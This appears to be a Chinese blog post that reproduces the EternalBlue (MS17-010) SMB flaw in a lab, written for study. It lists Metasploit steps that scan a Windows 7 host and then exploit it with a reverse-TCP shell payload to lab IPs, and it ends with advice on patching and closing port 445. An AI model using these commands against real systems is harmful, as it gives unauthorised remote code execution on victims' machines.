阅读须知
本公众号文章皆为网上公开的漏洞,仅供日常学习使用,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
2024/10/17 星期四
多云
.
.
// 前言
MS17-010也叫做“永恒之蓝”漏洞,是利用Windows Server Message Block (SMB) v1协议实现的远程代码执行漏洞,影响范围主要围绕Windows操作系统。攻击者利用MS17-010漏洞可以在未经授权的情况下远程执行任意代码,甚至可以在用户不知情的情况下获取Windows操作系统的权限。
// 漏洞复现
需要准备windows7-(含MS17010漏洞且关闭防火墙)与kali-(Metasploit Framework)两套系统。
1.开启msf(msfconsole)。
2.搜索ms17-010攻击模块(search ms17-010)。
3.选择漏洞辅助模块 (use auxiliary/scanner/smb/smb_ms17_010)。
4.设置目标ip (set rhosts 192.168.85.136)并开始扫描(exploit)。
5.发现192.168.85.136可能存在ms17-010漏洞。
6.调取模块并攻击存在漏洞的主机。
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set rhosts 192.168.85.136(被攻击主机ip)
set lhost 192.168.85.133(攻击主机ip)
exploit
7.攻击完成后执行系统命令进行下一步攻击。
// 修复方式
1.关闭445端口打开防火墙,安装安全软件。
2.安装微软发布的对应补丁或升级至无漏洞版本。
END
作者 | 剁椒Muyou鱼头
I like you,but just like you.
我喜欢你,仅仅如此,喜欢而已~
点赞在看不迷路哦
原文始发于微信公众号(剁椒Muyou鱼头):【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论